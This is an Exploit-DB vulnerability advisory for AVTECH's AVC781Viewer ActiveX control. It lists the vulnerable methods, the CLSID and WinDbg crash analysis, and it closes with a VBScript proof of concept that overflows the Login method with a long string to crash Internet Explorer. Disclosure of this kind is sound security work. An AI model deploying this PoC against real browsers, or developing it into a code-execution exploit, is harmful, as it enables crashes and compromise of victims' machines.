Avtech Software - ActiveX 'avc781viewer.dll' Multiple Vulnerabilities

EDB-ID:

12294

CVE:

N/A


Author:

LiquidWorm

Type:

dos


Platform:

Windows

Date:

2010-04-19


Title: AVTECH Software (AVC781Viewer.dll) ActiveX Multiple Remote Vulnerabilities



Vendor: AVTECH Software, Inc.
Product Web Page: http://www.avtech.com


Summary: AVTECH Software, a private corporation founded in 1988, is a computer software and
         hardware manufacturer specializing in providing Windows NT/2K/XP/2K3 products to monitor
         multi-OS computers and network issues throughout a department or an entire enterprise.
         Once issues or events occur, AVTECH Software products use today's most advanced alerting
         technologies to communicate critical and important status information to remote system
         managers and IT professionals via mobile phones, pagers, PDAs, email, the web and more.
         Automatic corrective actions can also be taken to immediately resolve issues, run scripts,
         and shutdown/restart servers or applications.

         AVTECH Software is now the premier worldwide manufacturer of environment monitoring equipment
         specifically designed to monitor today's advanced computer rooms and data centers. Our Room Alert
         and TemPageR products are used to monitor environmental conditions in many of the world's most
         secure data centers and are installed in almost every branch of the US government.


Description: AVTECH Software's AVC781Viewer ActiveX Control suffers from multiple remote vulnerabilities
             such as buffer overflow, integer overflow and denial of service (IE crash). This issue is
             triggered when an attacker convinces a victim user to visit a malicious website.

             Remote attackers may exploit this issue to execute arbitrary machine code in the context of
             the affected application, facilitating the remote compromise of affected computers. Failed
             exploit attempts likely result in browser crashes.


Windbg:
======================================================================================================

(265c.26b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00fe46f0 ebx=00000000 ecx=baadf00d edx=0000001f esi=baadf00d edi=0013f030
eip=10019003 esp=0013ed2c ebp=0013eef4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** WARNING: Unable to verify checksum for C:\WINDOWS\system32\AVC_AX_724_VIEWER.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for AVC_AX_724_VIEWER.dll - 
AVC_AX_724_VIEWER+0x19003:
10019003 837e3c65        cmp     dword ptr [esi+3Ch],65h ds:0023:baadf049=????????

======================================================================================================


Version Tested: 1.0.9.4

Platform Used: Microsoft Windows XP Professional Service Pack 3 (English)
               Microsoft Internet Explorer 8.0.6001.18702


Vulnerability Discovered By: Gjoko 'LiquidWorm' Krstic - liquidworm gmail com
			     Macedonian Information Security Research And Development Laboratory			     
			     Zero Science Lab - http://www.zeroscience.mk


Date: 18.04.2010


Advisory ID: ZSL-2010-4934
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4934.php



######################################## Internal Details ############################################

Vulnerabity type:

 - Buffer Overflow
 - Integer Overflow
 - Denial Of Service


Vulnerable library: AVC781Viewer

Vulnerable class: CV781Object

Vulnerable members: 

 - SendCommand
 - Login
 - Snapshot
 - _DownloadPBOpen
 - _DownloadPBOpen2
 - _DownloadPBClose
 - _DownloadPBControl


File location: C:\WINDOWS\system32\AVC_AX_724_VIEWER.dll
ProgID: AVC781Viewer.CV781Object
CLSID: 8214B72E-B0CD-466E-A44D-1D54D926038D
Version: 1.0.9.4
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data  
IPersist Safe:  Safe for untrusted: caller,data  
IPStorage Safe:  Safe for untrusted: caller,data


CompanyName		AVTECH
FileDescription		SOFTWARE
FileVersion		1.0.9.4
InternalName		AVC781Viewer.dll
LegalCopyright		AVTECH. All rights reserved.
OriginalFileName	AVC781Viewer.dll
ProductName		SOFTWARE
ProductVersion		1.0.9.4


Exception codes (AVC_AX_724_VIEWER.dll):
======================================================================================================

ACCESS_VIOLATION
Disasm: 10019003 CMP DWORD PTR [ESI+3C],65
=====
ACCESS_VIOLATION
Disasm: 1001906F MOV EAX,[ECX+48]
=====
ACCESS_VIOLATION
Disasm: 10006C23 MOV [EAX],CL
=====
ACCESS_VIOLATION
Disasm: 10007163 MOV [EAX],CL
=====
ACCESS_VIOLATION
Disasm: 10008437 MOV DWORD PTR [EAX+B58],1
=====
ACCESS_VIOLATION
Disasm: 10001DDB MOV ECX,[EAX+31C]
=====
ACCESS_VIOLATION
Disasm: 10001E34 MOV EAX,[EAX+31C]
=====
ACCESS_VIOLATION
Disasm: 10008867 MOV DWORD PTR [EAX+B58],1
=====



Two random exception details:
======================================================================================================
======================================================================================================


Exception Code: ACCESS_VIOLATION
Disasm: 10019003	CMP DWORD PTR [ESI+3C],65	(AVC_AX_724_VIEWER.dll)

Seh Chain:
--------------------------------------------------
1 	10023363 	AVC_AX_724_VIEWER.dll
2 	FC2950 	VBSCRIPT.dll
3 	7C839AC0 	KERNEL32.dll


Called From                   Returns To                    
--------------------------------------------------
AVC_AX_724_VIEWER.10019003    VBSCRIPT.F73E27               
VBSCRIPT.F73E27               VBSCRIPT.F73397               
VBSCRIPT.F73397               VBSCRIPT.F73D88               
VBSCRIPT.F73D88               VBSCRIPT.F7409F               
VBSCRIPT.F7409F               VBSCRIPT.F763EE               
VBSCRIPT.F763EE               VBSCRIPT.F76373               
VBSCRIPT.F76373               VBSCRIPT.F76BA5               
VBSCRIPT.F76BA5               VBSCRIPT.F76D9D               
VBSCRIPT.F76D9D               VBSCRIPT.F75103               
VBSCRIPT.F75103               SCROBJ.5CE44396               
SCROBJ.5CE44396               SCROBJ.5CE4480B               
SCROBJ.5CE4480B               SCROBJ.5CE446A6               
SCROBJ.5CE446A6               SCROBJ.5CE44643               
SCROBJ.5CE44643               SCROBJ.5CE44608               
SCROBJ.5CE44608               1013C93                       
1013C93                       1006B0C                       
1006B0C                       100332C                       
100332C                       1003105                       
1003105                       1003076                       
1003076                       1002F16                       
1002F16                       KERNEL32.7C817067             


Registers:
--------------------------------------------------
EIP 10019003 -> 10044530 -> Asc: 0E0E
EAX 00FE4658 -> 10044530 -> Asc: 0E0E
EBX 00000000
ECX BAADF00D
EDX 0000001F
EDI 0013F030 -> 0047DE68
ESI BAADF00D
EBP 0013EEF4 -> 0013EF30
ESP 0013ED2C -> 00000000


Block Disassembly: 
--------------------------------------------------
10018FFC	INT3
10018FFD	INT3
10018FFE	INT3
10018FFF	INT3
10019000	PUSH ESI
10019001	MOV ESI,ECX
10019003	CMP DWORD PTR [ESI+3C],65	  <--- CRASH
10019007	JNZ SHORT 10019030
10019009	MOV ECX,[ESI+10]
1001900C	TEST ECX,ECX
1001900E	JE SHORT 10019017
10019010	PUSH 66
10019012	CALL 1001B630
10019017	MOV EAX,[ESI+48]
1001901A	MOV ECX,[EAX]


ArgDump:
--------------------------------------------------
EBP+8	0047AAF0 -> 00000005
EBP+12	00FE4658 -> 10044530 -> Asc: 0E0E
EBP+16	00000001
EBP+20	00F71A2C -> 00000000
EBP+24	00000409
EBP+28	00000001


Stack Dump:
--------------------------------------------------
13ED2C 00 00 00 00 20 F4 00 10 30 F0 13 00 00 00 00 00  [................]
13ED3C F4 EE 13 00 00 00 00 00 BB 01 91 7C 08 00 00 00  [................]
13ED4C 40 00 00 00 30 00 00 00 08 D8 47 00 07 00 00 00  [..........G.....]
13ED5C 10 00 00 00 00 00 00 00 00 00 00 00 FA 00 00 00  [................]
13ED6C F8 D5 47 00 00 00 00 00 00 00 00 00 68 01 47 00  [..G.........h.G.] 


======================================================================================================
======================================================================================================


Exception Code: ACCESS_VIOLATION
Disasm: 10006C23	MOV [EAX],CL	(AVC_AX_724_VIEWER.dll)

Seh Chain:
--------------------------------------------------
1 	10022F68 	AVC_AX_724_VIEWER.dll
2 	FC2950 	VBSCRIPT.dll
3 	7C839AC0 	KERNEL32.dll


Called From                   Returns To                    
--------------------------------------------------
AVC_AX_724_VIEWER.10006C23    AVC_AX_724_VIEWER.10044508    
AVC_AX_724_VIEWER.10044508    AVC_AX_724_VIEWER.100097B0    
AVC_AX_724_VIEWER.100097B0    8244C8B                       


Registers:
--------------------------------------------------
EIP 10006C23
EAX BAADF06D
EBX 00180724 -> Uni: defaultV
ECX 0013EE41 -> 24001827 -> Uni: '$'$
EDX 00182801 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDI 001827BC -> Uni: defaultV
ESI 00180724 -> Uni: defaultV
EBP 00FE4658 -> 10044530 -> Asc: 0E0E
ESP 0013EE40 -> 001827BC


Block Disassembly: 
--------------------------------------------------
10006C12	MOV EAX,[EBP+144]
10006C18	ADD EAX,60
10006C1B	JMP SHORT 10006C20
10006C1D	LEA ECX,[ECX]
10006C20	MOV CL,[EDX]
10006C22	INC EDX
10006C23	MOV [EAX],CL	  <--- CRASH
10006C25	INC EAX
10006C26	TEST CL,CL
10006C28	JNZ SHORT 10006C20
10006C2A	MOV EAX,[ESP+20]
10006C2E	ADD EAX,-10
10006C31	LEA ECX,[EAX+C]
10006C34	OR EDX,FFFFFFFF
10006C37	LOCK XADD [ECX],EDX


ArgDump:
--------------------------------------------------
EBP+8	00FE4658 -> 10044530 -> Asc: 0E0E
EBP+12	001862FC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16	0018AB44 -> Uni: defaultV
EBP+20	00180A54 -> Uni: defaultV
EBP+24	00000001
EBP+28	00000001


Stack Dump:
--------------------------------------------------
13EE40 BC 27 18 00 24 07 18 00 F4 EE 13 00 74 1F 18 00  [............t...]
13EE50 AC F1 13 00 68 2F 02 10 FF FF FF FF B7 9B 00 10  [....h...........]
13EE60 00 28 18 00 74 1F 18 00 BC 27 18 00 24 07 18 00  [....t...........]
13EE70 5C 07 18 00 F4 EE 13 00 00 00 00 00 D8 DD 47 00  [\.............G.]
13EE80 58 46 FE 00 08 00 00 00 08 00 13 00 44 4A 12 77  [XF..........DJ.w]


======================================================================================================
======================================================================================================




Proof Of Concept:
######################################################################################################

<object classid='clsid:8214B72E-B0CD-466E-A44D-1D54D926038D' id='kungfuhustle' />
<script language='vbscript'>


targetFile = "C:\WINDOWS\system32\AVC_AX_724_VIEWER.dll"
prototype  = "Sub Login (
                        
                         ByVal Username As String,
                         ByVal Password As String,
                         ByVal MediaType As String,
                         ByVal ConnectType As String

                        )"
memberName = "Login"
progid     = "AVC781Viewer.CV781Object"
argCount   = 4

arg1=String(1010, "A")
arg2="defaultV"
arg3="defaultV"
arg4="defaultV"

kungfuhustle.Login arg1 ,arg2 ,arg3 ,arg4

</script>

######################################################################################################